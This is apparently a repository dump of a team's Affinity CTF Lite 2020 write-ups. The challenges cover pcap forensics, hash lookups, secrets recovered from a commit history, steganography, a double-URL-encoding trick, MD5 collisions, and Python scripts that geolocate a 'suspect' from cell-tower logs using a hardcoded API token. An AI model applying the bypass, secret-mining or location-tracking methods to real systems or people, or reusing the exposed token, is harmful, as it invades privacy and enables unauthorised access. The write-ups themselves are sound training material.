--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Hongqiao/crackstation.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/I need bass/b58CyberChef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/I need bass/b58CyberChef.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/I need bass/site.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/I need bass/site.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Lost_Head/README.md:
--------------------------------------------------------------------------------
 1 | # Writeup: Lost Head:triangular_flag_on_post: 
 2 | 
 3 | ***Category : Forensic***:minidisc:\
 4 | ***Points : 50***\
 5 | ***Author : krn bhargav (Ryn0)*** \
 6 | ***Team : Red-Knights***:warning:
 7 | ## Description
 8 | >We lost some data when the connection closed, can you recover something?
 9 | 
10 | [file](lostHead.pcapng)
11 | 
12 | ![description](description.png)
13 |   
14 | ## solution
15 | >we have a pcap file ,open it in wireshark,filter the http protocol and check the response from 'GET challenge.php' request
16 | 
17 | >you got flag in X-Affinity header.
18 |   
19 | ![wiresharkscreenshot](wiresharkscreenshot.png)
20 | 
21 | ```
22 | Flag : AFFCTF{DonT_TRust_h34d3r2}
23 | ```
24 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Lost_Head/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Lost_Head/description.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Lost_Head/lostHead.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Lost_Head/lostHead.pcapng


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Lost_Head/wiresharkscreenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Lost_Head/wiresharkscreenshot.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Magic Word/flag_printed.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Magic Word/flag_printed.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Magic Word/jmp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Magic Word/jmp.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Magic Word/magicword:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Magic Word/magicword


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Magic Word/magicword.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Magic Word/magicword.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Magic Word/nops.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Magic Word/nops.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Malicious File/README.md:
--------------------------------------------------------------------------------
 1 | # Malicious File
 2 | 
 3 | **Category: Osint** \
 4 | **Points: 30**
 5 | 
 6 | ## Desciption
 7 | 
 8 | We detected the following malicious file in our network, we weren’t able to find any issues with it, can you find something?
 9 | 
10 | ## Challenge
11 | 
12 | - Given malware hash
13 | - Find The Flag
14 | 
15 | ## Solution
16 | 
17 | We were give a text file:
18 | 1. [malware](https://github.com/Red-Knights-CTF/writeups/blob/master/2020/affinity_ctf_lite/Malicious%20File/malware)
19 | 
20 | We were given a `SHA-256` hash `88b35a9365e5cd2b32c03832d2c8c02a41e3cead40e49af02cf74a73bfa0dc8d` of a file. As mentioned in discription, it is a malware. The first website that pops to mind thinking about malwares is https://virustotal.com 
21 | 
22 | Paste your hash in the `Search` tab
23 | 
24 | ![](https://github.com/Red-Knights-CTF/writeups/blob/master/2020/affinity_ctf_lite/Malicious%20File/virustotal.png)
25 | 
26 | Result let us know that file is not a malware but the `Community` tab have something for us
27 | 
28 | ![](https://github.com/Red-Knights-CTF/writeups/blob/master/2020/affinity_ctf_lite/Malicious%20File/community.png)
29 | 
30 | Someone has left a url `https://pastebin.com/QqhzEFjK`. Going there will give u a `base64` string `QUZGQ1RGe2ZvbGxvd190aGVfYnJlYWRjcnVtYnN9`, Decode it.
31 | 
32 | ![](https://github.com/Red-Knights-CTF/writeups/blob/master/2020/affinity_ctf_lite/Malicious%20File/base64.png)
33 | 
34 | FLAG - AFFCTF{follow_the_breadcrumbs}
35 | 
36 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Malicious File/base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Malicious File/base64.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Malicious File/community.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Malicious File/community.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Malicious File/malware:
--------------------------------------------------------------------------------
1 | (88b35a9365e5cd2b32c03832d2c8c02a41e3cead40e49af02cf74a73bfa0dc8d)
2 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Malicious File/virustotal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Malicious File/virustotal.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/NotRandomCMS/CMS.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/NotRandomCMS/CMS.7z


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/NotRandomCMS/README.md:
--------------------------------------------------------------------------------
 1 | # NotRandomCMS
 2 | 
 3 | **Category**: OSINT \
 4 | **Point**: 129
 5 | 
 6 | Unzipping the file reveals a PHP web app. Since this is an OSINT problem, I
 7 | just seached "NotRandomCMS" on GitHub first, which takes us
 8 | [here](https://github.com/notrandomcms/notrandomcmsv1). Looking at the commit
 9 | history, we see
10 | [this commit](https://github.com/notrandomcms/notrandomcmsv1/commit/6cdec47e7b78394095de5c8856fd67e2a9b6410c)
11 | called "Remove secret files". Looking at
12 | [config/web.php](https://github.com/notrandomcms/notrandomcmsv1/blob/bc757ed02ff3927ab7ce0298be1099a4ca81dbe0/config/web.php)
13 | from this commit, we see:
14 | ```
15 |     // !!! insert a secret key in the following (if it is empty) - this is required by cookie validation
16 |     'cookieValidationKey' => 'AFFCTF{thisShouldBeASecret!}',
17 | ```
18 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/One is missing/README.md:
--------------------------------------------------------------------------------
 1 | # One is missing
 2 | 
 3 | **Category**: Steg \
 4 | **Points**: 10
 5 | 
 6 | ![](full_of__cuteness.jpg)
 7 | 
 8 | In the given picture. you'll see a cutes, if you used strings on the file you'll see the flag in the end.
 9 | 
10 | ![](strings.png)
11 | 
12 | the flag is `AFFCTF{HIDDENKITTEN}`
13 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/One is missing/full_of__cuteness.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/One is missing/full_of__cuteness.jpg


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/One is missing/strings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/One is missing/strings.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path of Double-Dipping/README.md:
--------------------------------------------------------------------------------
 1 | # Path of Double-Dipping
 2 | 
 3 | **Category**: Web \
 4 | **Points**: 85
 5 | 
 6 | Opening the given link: `http://web3.affinityctf.com` gives us the Challange name and description,
 7 | ![ndc](ndc.png)
 8 | Basically From the description you'll see the author gives u a directory.
 9 | and You'll see Double word in the Name
10 | first thing to came your mind it's URL DOUBLE "ENCODING" the lost word
11 | i'll use this website for double encoding https://www.url-encode-decode.com/
12 | and encode the given dir twice,
13 | ![urltwice](urltwice.png)<br>
14 | and put it into the url like this,and will get the flag.
15 | ![flag](flag.png)
16 | 
17 | The flag is `AFFCTF{1s7r1pl3D1p83tt3r?}`
18 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path of Double-Dipping/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path of Double-Dipping/flag.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path of Double-Dipping/ndc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path of Double-Dipping/ndc.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path of Double-Dipping/urltwice.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path of Double-Dipping/urltwice.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/Figure_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path_of_the_suspect/Figure_1.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/Figure_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path_of_the_suspect/archive/Figure_1.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/gpsvis:
--------------------------------------------------------------------------------
 1 | 49.91982,19.894857
 2 | 50.019426,19.891884
 3 | 50.035515,19.89006
 4 | 50.08049,19.876327
 5 | 49.991798,19.887314
 6 | 49.91908,20.191554
 7 | 49.973381,20.189938
 8 | 50.080490112305,20.189437866211
 9 | 50.092027,20.287366
10 | 50.105564,20.392029
11 | 50.003518,20.428104
12 | 49.934921264648,20.407791137695
13 | 49.921188354492,20.30891418457
14 | 50.10383605957,20.627517700195
15 | 50.107296,20.671112
16 | 50.102462768555,20.762100219727
17 | 50.070877075195,20.719528198242
18 | 50.022984,20.721794
19 | 50.004959106445,20.723648071289
20 | 49.968061,20.726086
21 | 50.115638,20.972863
22 | 50.064011,20.979355
23 | 50.020918,20.977612
24 | 49.948654174805,20.985946655273
25 | 49.958267211914,21.038131713867
26 | 49.957581,21.122589
27 | 50.145034790039,21.448745727539
28 | 50.066816,21.438063
29 | 49.998092651367,21.46110534668
30 | 49.99466,21.56479
31 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/main.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import pprint
 3 | import json
 4 | 
 5 | url = "https://us1.unwiredlabs.com/v2/process.php"
 6 | token = "pk.62bce8462ad93af8bb529310a573e935"
 7 | 
 8 | # payload = {
 9 | #     "token": "pk.62bce8462ad93af8bb529310a573e935",
10 | #     "radio": "gsm",
11 | #     "mcc": 260,
12 | #     "mnc": 3,
13 | #     "cells": [{
14 | #         "lac": 52911,
15 | #         "cid": 8961
16 | #     }],
17 | #     "address": 1
18 | # }
19 | 
20 | with open('src.json', 'r') as f:
21 |     src = json.load(f)
22 | 
23 | locs = []
24 | 
25 | for cell in src:
26 |     payload = {
27 |         'token': token,
28 |         'radio': cell['rtype'],
29 |         'mcc': cell['mcc'],
30 |         'mnc': cell['mnc'],
31 |         'cells': [{
32 |             'lac': cell['lac'],
33 |             'cid': cell['cid']
34 |         }],
35 |         'address': 1
36 |     }
37 | 
38 |     response = requests.request('POST', url, json=payload)
39 |     print("Received loc")
40 |     locs.append(response.json())
41 | 
42 | with open('locs.json', 'w') as f:
43 |     f.write(json.dumps(locs, indent=4))
44 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/main1.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import pprint
 3 | import json
 4 | import time
 5 | 
 6 | # https://www.opencellid.org/ajax/searchCell.php?mcc=260&mnc=3&lac=52911&cell_id=8961
 7 | 
 8 | url = 'https://www.opencellid.org/ajax/searchCell.php'
 9 | 
10 | with open('src.json', 'r') as f:
11 |     src = json.load(f)
12 | 
13 | locs = []
14 | 
15 | for cell in src:
16 |     payload = {
17 |         'mcc': cell['mcc'],
18 |         'mnc': cell['mnc'],
19 |         'lac': cell['lac'],
20 |         'cell_id': cell['cid']
21 |     }
22 | 
23 |     response = requests.request('GET', url, params=payload)
24 |     print("Received loc: ", response.json())
25 |     locs.append(response.json())
26 |     time.sleep(5)
27 | 
28 | with open('locs1.json', 'w') as f:
29 |     f.write(json.dumps(locs, indent=4))
30 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/manual_locs.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path_of_the_suspect/archive/manual_locs.txt


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/mapcust.txt:
--------------------------------------------------------------------------------
 1 | 49.914465, 19.877101
 2 | 50.024016, 19.895086
 3 | 50.034693, 19.895183
 4 | 50.079678, 19.88198
 5 | 49.989998, 19.876482
 6 | 
 7 | 49.923973, 20.189116
 8 | 49.96871, 20.113321
 9 | 50.026811, 20.216598
10 | 50.104272, 20.32828
11 | 49.897114, 20.427753
12 | 50.00397, 20.4294
13 | 50.317753, 20.579615
14 | 49.923744, 20.268881
15 | 
16 | 50.133148, 20.452311
17 | 50.102283, 20.697435
18 | 50.076893, 20.860228
19 | 49.835632, 20.42345
20 | 50.026696, 20.733899
21 | 49.989895, 20.625072
22 | 49.967453, 20.701647
23 | 
24 | 50.109528, 21.01312
25 | 50.062041, 20.978484
26 | 50.02284, 20.966575
27 | 50.001915, 20.978219
28 | 49.950378, 21.010592
29 | 49.965761, 21.119996
30 | 
31 | 50.128447, 21.424166
32 | 50.077454, 21.424437
33 | 50.090305, 21.297522
34 | 49.977055, 21.552629
35 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/notes.md:
--------------------------------------------------------------------------------
1 | 5
2 | 8
3 | 7
4 | 6
5 | 4
6 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/notes.txt:
--------------------------------------------------------------------------------
1 | IX3CY
2 | IOTLL
3 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/parse.py:
--------------------------------------------------------------------------------
 1 | import pprint
 2 | import json
 3 | 
 4 | 
 5 | with open('src.txt', 'r') as f:
 6 |     fstr = f.read()
 7 | 
 8 | ss = fstr.splitlines()
 9 | locs = []
10 | line_i = 0
11 | while line_i < len(ss):
12 |     print(ss[line_i])
13 |     line_i += 1  # Registered at
14 |     dates = ss[line_i].split()
15 |     line_i += 1
16 |     days = dates[0::2]
17 |     times = dates[1::2]
18 | 
19 |     mccs = ss[line_i].split()
20 |     line_i += 1
21 |     mccs = mccs[1::2]
22 |     mccs = [int(x) for x in mccs]
23 | 
24 |     mncs = ss[line_i].split()
25 |     line_i += 1
26 |     mncs = mncs[1::2]
27 |     mncs = [int(x) for x in mncs]
28 | 
29 |     lacs = ss[line_i].split()
30 |     line_i += 1
31 |     lacs = lacs[1::2]
32 |     lacs = [int(x) for x in lacs]
33 | 
34 |     cids = ss[line_i].split()
35 |     line_i += 1
36 |     cids = cids[1::2]
37 |     cids = [int(x) for x in cids]
38 | 
39 |     rtypes = ss[line_i].split()
40 |     line_i += 1
41 |     rtypes = rtypes[2::3]
42 | 
43 |     for i in range(len(days)):
44 |         loc = {}
45 |         loc['day'] = days[i]
46 |         loc['time'] = times[i]
47 |         loc['mcc'] = mccs[i]
48 |         loc['mnc'] = mncs[i]
49 |         loc['lac'] = lacs[i]
50 |         loc['cid'] = cids[i]
51 |         loc['rtype'] = rtypes[i]
52 |         locs.append(loc)
53 | 
54 | pprint.pprint(locs)
55 | 
56 | with open('src.json', 'w') as f:
57 |     f.write(json.dumps(locs, indent=4))
58 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/proc.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | 
 3 | with open('src.json', 'r') as f:
 4 |     src = json.load(f)
 5 | 
 6 | with open('locs.json', 'r') as f:
 7 |     locs = json.load(f)
 8 | 
 9 | print(len(src))
10 | print(len(locs))
11 | 
12 | with open('mapcust.txt', 'w') as f:
13 |     for loc in locs:
14 |         f.write("{}, {}\n".format(loc['lat'], loc['lon']))
15 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/proc1.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | import matplotlib.pyplot as plt
 3 | 
 4 | with open('src.json', 'r') as f:
 5 |     src = json.load(f)
 6 | 
 7 | with open('locs.json', 'r') as f:
 8 |     locs = json.load(f)
 9 | 
10 | print(len(src))
11 | print(len(locs))
12 | 
13 | groups = [5, 8, 7, 6, 4]
14 | gi = 0
15 | i = 0
16 | while i < len(locs):
17 |     group = locs[i: i + groups[gi]]
18 |     lats = []
19 |     lons = []
20 |     for x in group:
21 |         lats.append(x['lat'])
22 |         lons.append(x['lon'])
23 | 
24 |     print(lats)
25 |     print(lons)
26 |     plt.plot(lons, lats, marker='o')
27 | 
28 |     i += groups[gi]
29 |     gi += 1
30 | 
31 | # lats = []
32 | # lons = []
33 | # for loc in locs:
34 | #     lats.append(loc['lat'])
35 | #     lons.append(loc['lon'])
36 | 
37 | # plt.plot(lons, lats, marker='o')
38 | 
39 | plt.show()
40 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/proc2.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | import matplotlib.pyplot as plt
 3 | 
 4 | with open('src.json', 'r') as f:
 5 |     src = json.load(f)
 6 | 
 7 | with open('locs1.json', 'r') as f:
 8 |     locs = json.load(f)
 9 | 
10 | print(len(src))
11 | print(len(locs))
12 | 
13 | # groups = [5, 8, 7, 6, 4]
14 | # gi = 0
15 | # i = 0
16 | # while i < len(locs):
17 | #     group = locs[i: i + groups[gi]]
18 | #     lats = []
19 | #     lons = []
20 | #     for x in group:
21 | #         lats.append(x['lat'])
22 | #         lons.append(x['lon'])
23 | 
24 | #     print(lats)
25 | #     print(lons)
26 | #     plt.plot(lons, lats, marker='o')
27 | 
28 | #     i += groups[gi]
29 | #     gi += 1
30 | 
31 | lats = []
32 | lons = []
33 | for loc in locs:
34 |     lats.append(loc['lat'])
35 |     lons.append(loc['lon'])
36 | 
37 | plt.plot(lons, lats, marker='o')
38 | 
39 | plt.show()
40 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/proc3.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | import matplotlib.pyplot as plt
 3 | 
 4 | with open('src.json', 'r') as f:
 5 |     src = json.load(f)
 6 | 
 7 | with open('locs1.json', 'r') as f:
 8 |     locs = json.load(f)
 9 | 
10 | print(len(src))
11 | print(len(locs))
12 | 
13 | # groups = [5, 8, 7, 6, 4]
14 | # gi = 0
15 | # i = 0
16 | # while i < len(locs):
17 | #     group = locs[i: i + groups[gi]]
18 | #     lats = []
19 | #     lons = []
20 | #     for x in group:
21 | #         lats.append(x['lat'])
22 | #         lons.append(x['lon'])
23 | 
24 | #     print(lats)
25 | #     print(lons)
26 | #     plt.plot(lons, lats, marker='o')
27 | 
28 | #     i += groups[gi]
29 | #     gi += 1
30 | 
31 | with open('gpsvis', 'w') as f:
32 |     for loc in locs:
33 |         f.write("{},{}\n".format(loc['lat'], loc['lon']))
34 | 
35 | # plt.plot(lons, lats, marker='o')
36 | 
37 | # plt.show()
38 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/main.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import pprint
 3 | import json
 4 | import time
 5 | 
 6 | # https://www.opencellid.org/ajax/searchCell.php?mcc=260&mnc=3&lac=52911&cell_id=8961
 7 | 
 8 | url = 'https://www.opencellid.org/ajax/searchCell.php'
 9 | 
10 | with open('src.json', 'r') as f:
11 |     src = json.load(f)
12 | 
13 | locs = []
14 | 
15 | for cell in src:
16 |     payload = {
17 |         'mcc': cell['mcc'],
18 |         'mnc': cell['mnc'],
19 |         'lac': cell['lac'],
20 |         'cell_id': cell['cid']
21 |     }
22 | 
23 |     response = requests.request('GET', url, params=payload)
24 |     print("Received loc: ", response.json())
25 |     locs.append(response.json())
26 |     time.sleep(5)
27 | 
28 | with open('locs1.json', 'w') as f:
29 |     f.write(json.dumps(locs, indent=4))
30 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/map.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path_of_the_suspect/map.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/mapconv:
--------------------------------------------------------------------------------
 1 | 49.91982,19.894857
 2 | 50.019426,19.891884
 3 | 50.035515,19.89006
 4 | 50.08049,19.876327
 5 | 49.991798,19.887314
 6 | 49.91908,20.191554
 7 | 49.973381,20.189938
 8 | 50.080490112305,20.189437866211
 9 | 50.092027,20.287366
10 | 50.105564,20.392029
11 | 50.003518,20.428104
12 | 49.934921264648,20.407791137695
13 | 49.921188354492,20.30891418457
14 | 50.10383605957,20.627517700195
15 | 50.107296,20.671112
16 | 50.102462768555,20.762100219727
17 | 50.070877075195,20.719528198242
18 | 50.022984,20.721794
19 | 50.004959106445,20.723648071289
20 | 49.968061,20.726086
21 | 50.115638,20.972863
22 | 50.064011,20.979355
23 | 50.020918,20.977612
24 | 49.948654174805,20.985946655273
25 | 49.958267211914,21.038131713867
26 | 49.957581,21.122589
27 | 50.145034790039,21.448745727539
28 | 50.066816,21.438063
29 | 49.998092651367,21.46110534668
30 | 49.99466,21.56479
31 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/parse.py:
--------------------------------------------------------------------------------
 1 | import pprint
 2 | import json
 3 | 
 4 | 
 5 | with open('src.txt', 'r') as f:
 6 |     fstr = f.read()
 7 | 
 8 | ss = fstr.splitlines()
 9 | locs = []
10 | line_i = 0
11 | while line_i < len(ss):
12 |     print(ss[line_i])
13 |     line_i += 1  # Registered at
14 |     dates = ss[line_i].split()
15 |     line_i += 1
16 |     days = dates[0::2]
17 |     times = dates[1::2]
18 | 
19 |     mccs = ss[line_i].split()
20 |     line_i += 1
21 |     mccs = mccs[1::2]
22 |     mccs = [int(x) for x in mccs]
23 | 
24 |     mncs = ss[line_i].split()
25 |     line_i += 1
26 |     mncs = mncs[1::2]
27 |     mncs = [int(x) for x in mncs]
28 | 
29 |     lacs = ss[line_i].split()
30 |     line_i += 1
31 |     lacs = lacs[1::2]
32 |     lacs = [int(x) for x in lacs]
33 | 
34 |     cids = ss[line_i].split()
35 |     line_i += 1
36 |     cids = cids[1::2]
37 |     cids = [int(x) for x in cids]
38 | 
39 |     rtypes = ss[line_i].split()
40 |     line_i += 1
41 |     rtypes = rtypes[2::3]
42 | 
43 |     for i in range(len(days)):
44 |         loc = {}
45 |         loc['day'] = days[i]
46 |         loc['time'] = times[i]
47 |         loc['mcc'] = mccs[i]
48 |         loc['mnc'] = mncs[i]
49 |         loc['lac'] = lacs[i]
50 |         loc['cid'] = cids[i]
51 |         loc['rtype'] = rtypes[i]
52 |         locs.append(loc)
53 | 
54 | pprint.pprint(locs)
55 | 
56 | with open('src.json', 'w') as f:
57 |     f.write(json.dumps(locs, indent=4))
58 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/proc.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | import matplotlib.pyplot as plt
 3 | 
 4 | with open('locs.json', 'r') as f:
 5 |     locs = json.load(f)
 6 | 
 7 | with open('mapconv', 'w') as f:
 8 |     for loc in locs:
 9 |         f.write("{},{}\n".format(loc['lat'], loc['lon']))
10 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/suspect_BTS_registration_log.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path_of_the_suspect/suspect_BTS_registration_log.pdf


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/README.md:
--------------------------------------------------------------------------------
1 | # Affinity CTF Lite 2020
2 | 
3 | **Site**: http://affinityctf.com/
4 | 
5 | **Rank**: 5 / 689
6 | 
7 | ![rank](rank.png)
8 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Shark has a long tail/CyberChef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Shark has a long tail/CyberChef.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Shark has a long tail/SharkHasALongTail.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Shark has a long tail/SharkHasALongTail.pcap


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Shark has a long tail/wire_shark.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Shark has a long tail/wire_shark.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Wholeisbetter/There_is_a_flag_somewhere.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Wholeisbetter/There_is_a_flag_somewhere.pdf


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/collision_course/README.md:
--------------------------------------------------------------------------------
 1 | # Collision course
 2 | 
 3 | **Category**: Cryptography \
 4 | **Points**: 500
 5 | 
 6 | ## Challenge
 7 | - Create 2 DIFFERENT files with the same md5 hash.
 8 | - Additionally, the files have to contain the phrase: "AFFCTF".
 9 | - File size limit is is 100000b
10 | 
11 | ## Solution
12 | 
13 | Grab two 4.0KB example files with an md5 collision:
14 | 1. [collision1.zip](https://github.com/corkami/collisions/blob/master/examples/collision1.zip)
15 | 2. [collision2.zip](https://github.com/corkami/collisions/blob/master/examples/collision2.zip)
16 | 
17 | Append `AFFCTF` to both.
18 | ```
19 | $ md5sum collision1.zip collision2.zip
20 | 2b980a3708ff9edfdd6c8dfbb42e4f8d  collision1.zip
21 | 2b980a3708ff9edfdd6c8dfbb42e4f8d  collision2.zip
22 | 
23 | $ echo "AFFCTF" >> collision1.zip
24 | $ echo "AFFCTF" >> collision2.zip
25 | 
26 | $ md5sum collision1.zip collision2.zip
27 | f6ff7f5a9c9dfcb3715d05bde1e6f708  collision1.zip
28 | f6ff7f5a9c9dfcb3715d05bde1e6f708  collision2.zip
29 | ```
30 | 
31 | Submitting this to the challenge page, I got:
32 | ```
33 | Checking, please wait...
34 | String found in the first file
35 | String found in the second file
36 | Checking if files are different...
37 | Files are different
38 | Checking if files are MD5 Hash is the same for both files...
39 | MD5Hashes are the same. You were right. The flag is: AFFCTF{One_Way_Or_Another}
40 | ```
41 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/collision_course/collision1.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/collision_course/collision1.zip


--------------------------------------------------------------------------------
